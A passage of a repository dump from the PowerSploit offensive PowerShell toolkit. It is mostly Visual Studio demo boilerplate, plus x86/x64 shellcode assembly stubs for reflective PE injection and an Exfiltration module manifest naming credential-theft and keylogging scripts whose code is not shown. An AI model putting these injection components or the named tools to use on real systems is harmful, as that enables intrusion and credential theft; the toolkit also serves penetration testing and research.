DLL_THREAD_ATTACH: 22 | case DLL_THREAD_DETACH: 23 | case DLL_PROCESS_DETACH: 24 | break; 25 | } 26 | return TRUE; 27 | } 28 | 29 | -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/stdafx.cpp: -------------------------------------------------------------------------------- 1 | // stdafx.cpp : source file that includes just the standard includes 2 | // DemoDLL_RemoteProcess.pch will be the pre-compiled header 
3 | // stdafx.obj will contain the pre-compiled type information 4 | 5 | #include "stdafx.h" 6 | 7 | // TODO: reference any additional headers you need in STDAFX.H 8 | // and not in this file 9 | -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/stdafx.h: -------------------------------------------------------------------------------- 1 | // stdafx.h : include file for standard system include files, 2 | // or project specific include files that are used frequently, but 3 | // are changed infrequently 4 | // 5 | 6 | #pragma once 7 | 8 | #include "targetver.h" 9 | 10 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers 11 | // Windows Header Files: 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | 18 | 19 | // TODO: reference additional headers your program requires here 20 | -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/targetver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // Including SDKDDKVer.h defines the highest available Windows platform. 4 | 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. 
7 | 8 | #include 9 | -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 2012 4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DemoExe_MD", "DemoExe_MD\DemoExe_MD.vcxproj", "{F674A5CE-F75F-4035-90AB-46DEBC670282}" 5 | EndProject 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DemoExe_MDd", "DemoExe_MDd\DemoExe_MDd.vcxproj", "{18FA8A49-4663-4FD8-9F0B-BD489A385A7B}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Win32 = Debug|Win32 11 | Debug|x64 = Debug|x64 12 | Release|Win32 = Release|Win32 13 | Release|x64 = Release|x64 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {F674A5CE-F75F-4035-90AB-46DEBC670282}.Debug|Win32.ActiveCfg = Debug|Win32 17 | {F674A5CE-F75F-4035-90AB-46DEBC670282}.Debug|Win32.Build.0 = Debug|Win32 18 | {F674A5CE-F75F-4035-90AB-46DEBC670282}.Debug|x64.ActiveCfg = Debug|x64 19 | {F674A5CE-F75F-4035-90AB-46DEBC670282}.Debug|x64.Build.0 = Debug|x64 20 | {F674A5CE-F75F-4035-90AB-46DEBC670282}.Release|Win32.ActiveCfg = Release|Win32 21 | {F674A5CE-F75F-4035-90AB-46DEBC670282}.Release|Win32.Build.0 = Release|Win32 22 | {F674A5CE-F75F-4035-90AB-46DEBC670282}.Release|x64.ActiveCfg = Release|x64 23 | {F674A5CE-F75F-4035-90AB-46DEBC670282}.Release|x64.Build.0 = Release|x64 24 | {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Debug|Win32.ActiveCfg = Debug|Win32 25 | {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Debug|Win32.Build.0 = Debug|Win32 26 | {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Debug|x64.ActiveCfg = Debug|x64 27 | {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Debug|x64.Build.0 = Debug|x64 28 | {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Release|Win32.ActiveCfg = 
Release|Win32 29 | {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Release|Win32.Build.0 = Release|Win32 30 | {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Release|x64.ActiveCfg = Release|x64 31 | {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Release|x64.Build.0 = Release|x64 32 | EndGlobalSection 33 | GlobalSection(SolutionProperties) = preSolution 34 | HideSolutionNode = FALSE 35 | EndGlobalSection 36 | EndGlobal 37 | -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/DemoExe_MD.cpp: -------------------------------------------------------------------------------- 1 | // DemoExe.cpp : Defines the entry point for the console application. 2 | // 3 | 4 | #include "stdafx.h" 5 | #include 6 | 7 | using namespace std; 8 | 9 | int _tmain(int argc, _TCHAR* argv[]) 10 | { 11 | printf("Exe loaded! Printing argc and argv\n\n"); 12 | 13 | printf("Argc: %d\n", argc); 14 | printf("ArgvAddress: %d\n", argv); 15 | 16 | for (int i = 0; i < argc; i++) 17 | { 18 | wprintf(L"Argv: %s\n", argv[i]); 19 | } 20 | 21 | printf("Exiting exe\n"); 22 | 23 | return 0; 24 | } 25 | 26 | 27 | -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/DemoExe_MD.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | Header Files 23 | 24 | 25 | Header Files 26 | 27 | 28 | 29 | 30 | Source Files 31 | 32 | 33 | Source Files 34 | 35 | 36 | 
-------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/ReadMe.txt: -------------------------------------------------------------------------------- 1 | ======================================================================== 2 | CONSOLE APPLICATION : DemoExe_MD Project Overview 3 | ======================================================================== 4 | 5 | AppWizard has created this DemoExe_MD application for you. 6 | 7 | This file contains a summary of what you will find in each of the files that 8 | make up your DemoExe_MD application. 9 | 10 | 11 | DemoExe_MD.vcxproj 12 | This is the main project file for VC++ projects generated using an Application Wizard. 13 | It contains information about the version of Visual C++ that generated the file, and 14 | information about the platforms, configurations, and project features selected with the 15 | Application Wizard. 16 | 17 | DemoExe_MD.vcxproj.filters 18 | This is the filters file for VC++ projects generated using an Application Wizard. 19 | It contains information about the association between the files in your project 20 | and the filters. This association is used in the IDE to show grouping of files with 21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the 22 | "Source Files" filter). 23 | 24 | DemoExe_MD.cpp 25 | This is the main application source file. 26 | 27 | ///////////////////////////////////////////////////////////////////////////// 28 | Other standard files: 29 | 30 | StdAfx.h, StdAfx.cpp 31 | These files are used to build a precompiled header (PCH) file 32 | named DemoExe_MD.pch and a precompiled types file named StdAfx.obj. 
33 | 34 | ///////////////////////////////////////////////////////////////////////////// 35 | Other notes: 36 | 37 | AppWizard uses "TODO:" comments to indicate parts of the source code you 38 | should add to or customize. 39 | 40 | ///////////////////////////////////////////////////////////////////////////// 41 | -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/stdafx.cpp: -------------------------------------------------------------------------------- 1 | // stdafx.cpp : source file that includes just the standard includes 2 | // DemoExe_MD.pch will be the pre-compiled header 3 | // stdafx.obj will contain the pre-compiled type information 4 | 5 | #include "stdafx.h" 6 | 7 | // TODO: reference any additional headers you need in STDAFX.H 8 | // and not in this file 9 | -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/stdafx.h: -------------------------------------------------------------------------------- 1 | // stdafx.h : include file for standard system include files, 2 | // or project specific include files that are used frequently, but 3 | // are changed infrequently 4 | // 5 | 6 | #pragma once 7 | 8 | #include "targetver.h" 9 | 10 | #include 11 | #include 12 | 13 | 14 | 15 | // TODO: reference additional headers your program requires here 16 | -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/targetver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // Including SDKDDKVer.h defines the highest available Windows platform. 
4 | 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. 7 | 8 | #include 9 | -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/DemoExe_MDd.cpp: -------------------------------------------------------------------------------- 1 | // DemoExe.cpp : Defines the entry point for the console application. 2 | // 3 | 4 | #include "stdafx.h" 5 | #include 6 | 7 | using namespace std; 8 | 9 | int _tmain(int argc, _TCHAR* argv[]) 10 | { 11 | printf("Exe loaded! Printing argc and argv\n\n"); 12 | 13 | printf("Argc: %d\n", argc); 14 | printf("ArgvAddress: %d\n", argv); 15 | 16 | for (int i = 0; i < argc; i++) 17 | { 18 | wprintf(L"Argv: %s\n", argv[i]); 19 | } 20 | 21 | printf("Exiting exe\n"); 22 | 23 | return 0; 24 | } 25 | 26 | 27 | -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/DemoExe_MDd.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | Header Files 23 | 24 | 25 | Header Files 26 | 27 | 28 | 29 | 30 | Source Files 31 | 32 | 33 | Source Files 34 | 35 | 36 | -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/ReadMe.txt: 
-------------------------------------------------------------------------------- 1 | ======================================================================== 2 | CONSOLE APPLICATION : DemoExe_MDd Project Overview 3 | ======================================================================== 4 | 5 | AppWizard has created this DemoExe_MDd application for you. 6 | 7 | This file contains a summary of what you will find in each of the files that 8 | make up your DemoExe_MDd application. 9 | 10 | 11 | DemoExe_MDd.vcxproj 12 | This is the main project file for VC++ projects generated using an Application Wizard. 13 | It contains information about the version of Visual C++ that generated the file, and 14 | information about the platforms, configurations, and project features selected with the 15 | Application Wizard. 16 | 17 | DemoExe_MDd.vcxproj.filters 18 | This is the filters file for VC++ projects generated using an Application Wizard. 19 | It contains information about the association between the files in your project 20 | and the filters. This association is used in the IDE to show grouping of files with 21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the 22 | "Source Files" filter). 23 | 24 | DemoExe_MDd.cpp 25 | This is the main application source file. 26 | 27 | ///////////////////////////////////////////////////////////////////////////// 28 | Other standard files: 29 | 30 | StdAfx.h, StdAfx.cpp 31 | These files are used to build a precompiled header (PCH) file 32 | named DemoExe_MDd.pch and a precompiled types file named StdAfx.obj. 33 | 34 | ///////////////////////////////////////////////////////////////////////////// 35 | Other notes: 36 | 37 | AppWizard uses "TODO:" comments to indicate parts of the source code you 38 | should add to or customize. 
39 | 40 | ///////////////////////////////////////////////////////////////////////////// 41 | -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/stdafx.cpp: -------------------------------------------------------------------------------- 1 | // stdafx.cpp : source file that includes just the standard includes 2 | // DemoExe_MDd.pch will be the pre-compiled header 3 | // stdafx.obj will contain the pre-compiled type information 4 | 5 | #include "stdafx.h" 6 | 7 | // TODO: reference any additional headers you need in STDAFX.H 8 | // and not in this file 9 | -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/stdafx.h: -------------------------------------------------------------------------------- 1 | // stdafx.h : include file for standard system include files, 2 | // or project specific include files that are used frequently, but 3 | // are changed infrequently 4 | // 5 | 6 | #pragma once 7 | 8 | #include "targetver.h" 9 | 10 | #include 11 | #include 12 | 13 | 14 | 15 | // TODO: reference additional headers your program requires here 16 | -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/targetver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // Including SDKDDKVer.h defines the highest available Windows platform. 4 | 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. 
7 | 8 | #include 9 | -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 2012 4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ExeToInjectInTo", "ExeToInjectInTo\ExeToInjectInTo.vcxproj", "{B9FD99EA-9BD2-4A39-A367-C16B680B41F3}" 5 | EndProject 6 | Global 7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 8 | Debug|Win32 = Debug|Win32 9 | Release|Win32 = Release|Win32 10 | EndGlobalSection 11 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 12 | {B9FD99EA-9BD2-4A39-A367-C16B680B41F3}.Debug|Win32.ActiveCfg = Debug|Win32 13 | {B9FD99EA-9BD2-4A39-A367-C16B680B41F3}.Debug|Win32.Build.0 = Debug|Win32 14 | {B9FD99EA-9BD2-4A39-A367-C16B680B41F3}.Release|Win32.ActiveCfg = Release|Win32 15 | {B9FD99EA-9BD2-4A39-A367-C16B680B41F3}.Release|Win32.Build.0 = Release|Win32 16 | EndGlobalSection 17 | GlobalSection(SolutionProperties) = preSolution 18 | HideSolutionNode = FALSE 19 | EndGlobalSection 20 | EndGlobal 21 | -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/ExeToInjectInTo.cpp: -------------------------------------------------------------------------------- 1 | // ExeToInjectInTo.cpp : Defines the entry point for the console application. 
2 | // 3 | 4 | #include "stdafx.h" 5 | #include 6 | 7 | using namespace std; 8 | 9 | int _tmain(int argc, _TCHAR* argv[]) 10 | { 11 | printf("Press enter to close.\n"); 12 | getchar(); 13 | 14 | return 0; 15 | } 16 | 17 | -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/ExeToInjectInTo.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | Header Files 23 | 24 | 25 | Header Files 26 | 27 | 28 | 29 | 30 | Source Files 31 | 32 | 33 | Source Files 34 | 35 | 36 | -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/ReadMe.txt: -------------------------------------------------------------------------------- 1 | ======================================================================== 2 | CONSOLE APPLICATION : ExeToInjectInTo Project Overview 3 | ======================================================================== 4 | 5 | AppWizard has created this ExeToInjectInTo application for you. 6 | 7 | This file contains a summary of what you will find in each of the files that 8 | make up your ExeToInjectInTo application. 9 | 10 | 11 | ExeToInjectInTo.vcxproj 12 | This is the main project file for VC++ projects generated using an Application Wizard. 
13 | It contains information about the version of Visual C++ that generated the file, and 14 | information about the platforms, configurations, and project features selected with the 15 | Application Wizard. 16 | 17 | ExeToInjectInTo.vcxproj.filters 18 | This is the filters file for VC++ projects generated using an Application Wizard. 19 | It contains information about the association between the files in your project 20 | and the filters. This association is used in the IDE to show grouping of files with 21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the 22 | "Source Files" filter). 23 | 24 | ExeToInjectInTo.cpp 25 | This is the main application source file. 26 | 27 | ///////////////////////////////////////////////////////////////////////////// 28 | Other standard files: 29 | 30 | StdAfx.h, StdAfx.cpp 31 | These files are used to build a precompiled header (PCH) file 32 | named ExeToInjectInTo.pch and a precompiled types file named StdAfx.obj. 33 | 34 | ///////////////////////////////////////////////////////////////////////////// 35 | Other notes: 36 | 37 | AppWizard uses "TODO:" comments to indicate parts of the source code you 38 | should add to or customize. 
39 | 40 | ///////////////////////////////////////////////////////////////////////////// 41 | -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/stdafx.cpp: -------------------------------------------------------------------------------- 1 | // stdafx.cpp : source file that includes just the standard includes 2 | // ExeToInjectInTo.pch will be the pre-compiled header 3 | // stdafx.obj will contain the pre-compiled type information 4 | 5 | #include "stdafx.h" 6 | 7 | // TODO: reference any additional headers you need in STDAFX.H 8 | // and not in this file 9 | -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/stdafx.h: -------------------------------------------------------------------------------- 1 | // stdafx.h : include file for standard system include files, 2 | // or project specific include files that are used frequently, but 3 | // are changed infrequently 4 | // 5 | 6 | #pragma once 7 | 8 | #include "targetver.h" 9 | 10 | #include 11 | #include 12 | 13 | 14 | 15 | // TODO: reference additional headers your program requires here 16 | -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/targetver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // Including SDKDDKVer.h defines the highest available Windows platform. 4 | 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. 
7 | 8 | #include 9 | -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/readme.txt: -------------------------------------------------------------------------------- 1 | This contains the assembly code I used to build the shellcode the PowerShell script uses. Some of the assembly isn't included beause I didn't save it, this should just be for the SUPER easy stuff like moving an address to EAX and returning. 2 | 3 | Compile: 4 | x64: 5 | nasm -f elf64 FileName.asm 6 | ld -o FileName FileName.o 7 | objdump -M intel -d FileName 8 | 9 | x86: 10 | nasm FileName.asm 11 | ld -o FileName FileName.o 12 | objdump -M intel -d FileName -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/CallDllMain.asm: -------------------------------------------------------------------------------- 1 | [SECTION .text] 2 | global _start 3 | 4 | _start: 5 | ; Get stack setup 6 | push rbx 7 | mov rbx, rsp 8 | and sp, 0xff00 9 | 10 | ; Call DllMain 11 | mov rcx, 0x4141414141414141 ; DLLHandle, set by PowerShell 12 | mov rdx, 0x1 ; PROCESS_ATTACH 13 | mov r8, 0x0 ; NULL 14 | mov rax, 0x4141414141414141 ; Address of DllMain, set by PS 15 | call rax 16 | 17 | ; Fix stack 18 | mov rsp, rbx 19 | pop rbx 20 | ret 21 | -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/ExitThread.asm: -------------------------------------------------------------------------------- 1 | [SECTION .text] 2 | 3 | global _start 4 | 5 | _start: 6 | ; Set a var to 1, let PS known exe is exiting 7 | mov rbx, 0x4141414141414141 8 | mov [rbx], byte 0x01 9 | 10 | ; Call exitthread instead of exitprocess 11 | sub rsp, 0xc0 12 | and sp, 0xFFf0 ; Needed for stack alignment 13 | mov 
rbx, 0x4141414141414141 14 | call rbx 15 | -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/GetFuncAddress.asm: -------------------------------------------------------------------------------- 1 | [SECTION .text] 2 | 3 | global _start 4 | 5 | _start: 6 | ; Save state of rbx and stack 7 | push rbx 8 | mov rbx, rsp 9 | 10 | ; Set up stack for function call to GetProcAddress 11 | sub rsp, 0x20 12 | and sp, 0xffc0 13 | 14 | ; Call getprocaddress 15 | mov rcx, 0x4141414141414141 ; DllHandle, set by PS 16 | mov rdx, 0x4141414141414141 ; Ptr to FuncName string, set by PS 17 | mov rax, 0x4141414141414141 ; GetProcAddress address, set by PS 18 | call rax 19 | 20 | ; Store the result 21 | mov rcx, 0x4141414141414141 ; Ptr to buffer to save result,set by PS 22 | mov [rcx], rax 23 | 24 | ; Restore stack 25 | mov rsp, rbx 26 | pop rbx 27 | ret 28 | -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/LoadLibraryA.asm: -------------------------------------------------------------------------------- 1 | [SECTION .text] 2 | 3 | global _start 4 | 5 | _start: 6 | ; Save rsp and setup stack for function call 7 | push rbx 8 | mov rbx, rsp 9 | sub rsp, 0x20 10 | and sp, 0xffc0 11 | 12 | ; Call LoadLibraryA 13 | mov rcx, 0x4141414141414141 ; Ptr to string of library, set by PS 14 | mov rdx, 0x4141414141414141 ; Address of LoadLibrary, set by PS 15 | call rdx 16 | 17 | mov rdx, 0x4141414141414141 ; Ptr to save result, set by PS 18 | mov [rdx], rax 19 | 20 | ; Fix stack 21 | mov rsp, rbx 22 | pop rbx 23 | ret 24 | -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x86/CallDllMain.asm: 
-------------------------------------------------------------------------------- 1 | [SECTION .text] 2 | global _start 3 | 4 | _start: 5 | ; Get stack setup 6 | push ebx 7 | mov ebx, esp 8 | and esp, 0xfffffff0 9 | 10 | ; Call DllMain 11 | mov ecx, 0x41414141 ; DLLHandle, set by PowerShell 12 | mov edx, 0x1 ; PROCESS_ATTACH 13 | mov eax, 0x0 ; NULL 14 | push eax 15 | push edx 16 | push ecx 17 | mov eax, 0x41414141 ; Address of DllMain, set by PS 18 | call eax 19 | 20 | ; Fix stack 21 | mov esp, ebx 22 | pop ebx 23 | ret 24 | -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x86/ExitThread.asm: -------------------------------------------------------------------------------- 1 | [SECTION .text] 2 | global _start 3 | 4 | _start: 5 | ; Set a var to 1, let PS know the EXE is exiting 6 | mov ebx, 0x41414141 7 | mov [ebx], byte 0x01 8 | 9 | ; Call exitthread instead of exit process 10 | sub esp, 0x20 11 | and esp, 0xFFFFFFc0 ; Needed for stack alignment 12 | mov ebx, 0x41414141 13 | call ebx 14 | -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x86/GetProcAddress.asm: -------------------------------------------------------------------------------- 1 | [SECTION .text] 2 | 3 | global _start 4 | 5 | _start: 6 | ; Save state of ebx and stack 7 | push ebx 8 | mov ebx, esp 9 | 10 | ; Align stack 11 | and esp, 0xffffffc0 12 | 13 | ; Call GetProcAddress 14 | mov eax, 0x41414141 ; DllHandle, supplied by PS 15 | mov ecx, 0x41414141 ; Function name, supplied by PS 16 | push ecx 17 | push eax 18 | mov eax, 0x41414141 ; GetProcAddress address, supplied by PS 19 | call eax 20 | 21 | ; Write GetProcAddress return value to an address supplied by PS 22 | mov ecx, 0x41414141 ; Address supplied by PS 23 | mov [ecx], eax 24 | 25 | ; Fix stack 26 | mov esp, 
ebx 27 | pop ebx 28 | ret 29 | -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Usage.md: -------------------------------------------------------------------------------- 1 | To install this module, drop the entire CodeExecution folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable. 2 | 3 | The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules" 4 | The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules" 5 | 6 | To use the module, type `Import-Module CodeExecution` 7 | 8 | To see the commands imported, type `Get-Command -Module CodeExecution` 9 | 10 | For help on each individual command, Get-Help is your friend. 11 | 12 | Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability. -------------------------------------------------------------------------------- /powershell/PowerSploit/Exfiltration/Exfiltration.psd1: -------------------------------------------------------------------------------- 1 | @{ 2 | 3 | # Script module or binary module file associated with this manifest. 4 | ModuleToProcess = 'Exfiltration.psm1' 5 | 6 | # Version number of this module. 
7 | ModuleVersion = '3.0.0.0' 8 | 9 | # ID used to uniquely identify this module 10 | GUID = '75dafa99-1402-4e29-b5d4-6c87da2b323a' 11 | 12 | # Author of this module 13 | Author = 'Matthew Graeber' 14 | 15 | # Copyright statement for this module 16 | Copyright = 'BSD 3-Clause' 17 | 18 | # Description of the functionality provided by this module 19 | Description = 'PowerSploit Exfiltration Module' 20 | 21 | # Minimum version of the Windows PowerShell engine required by this module 22 | PowerShellVersion = '2.0' 23 | 24 | # Format files (.ps1xml) to be loaded when importing this module 25 | FormatsToProcess = 'Get-VaultCredential.ps1xml' 26 | 27 | # Functions to export from this module 28 | FunctionsToExport = '*' 29 | 30 | # List of all files packaged with this module 31 | FileList = 'Exfiltration.psm1', 'Exfiltration.psd1', 'Get-TimedScreenshot.ps1', 'Out-Minidump.ps1', 32 | 'Get-Keystrokes.ps1', 'Get-GPPPassword.ps1', 'Usage.md', 'Invoke-Mimikatz.ps1', 33 | 'Invoke-NinjaCopy.ps1', 'Invoke-TokenManipulation.ps1', 'Invoke-CredentialInjection.ps1', 34 | 'VolumeShadowCopyTools.ps1', 'Get-VaultCredential.ps1', 'Get-VaultCredential.ps1xml', 35 | 'Get-MicrophoneAudio.ps1', 'Get-GPPAutologon.ps1' 36 | 37 | } 38 | -------------------------------------------------------------------------------- /powershell/PowerSploit/Exfiltration/Exfiltration.psm1: -------------------------------------------------------------------------------- 1 | Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . 
$_.FullName} 2 | -------------------------------------------------------------------------------- /powershell/PowerSploit/Exfiltration/Get-VaultCredential.ps1xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | VaultItemView 6 | 7 | VAULTCLI.VAULTITEM 8 | 9 | 10 | 11 | 12 | 13 | 14 | Vault 15 | 16 | 17 | Resource 18 | 19 | 20 | Identity 21 | 22 | 23 | Credential 24 | 25 | 26 | PackageSid 27 | 28 | 29 | LastModified 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | -------------------------------------------------------------------------------- /powershell/PowerSploit/Exfiltration/LogonUser/LogonUser/LogonUser.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 2012 4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "logon", "logon\logon.vcxproj", "{D248AC1C-B831-42AE-835A-1B98B2BF9DF3}" 5 | EndProject 6 | Global 7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 8 | Debug|Win32 = Debug|Win32 9 | Debug|x64 = Debug|x64 10 | Release|Win32 = Release|Win32 11 | Release|x64 = Release|x64 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Debug|Win32.ActiveCfg = Debug|Win32 15 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Debug|Win32.Build.0 = Debug|Win32 16 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Debug|x64.ActiveCfg = Debug|x64 17 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Debug|x64.Build.0 = Debug|x64 18 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Release|Win32.ActiveCfg = Release|Win32 19 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Release|Win32.Build.0 = Release|Win32 20 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Release|x64.ActiveCfg = Release|x64 21 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Release|x64.Build.0 = Release|x64 22 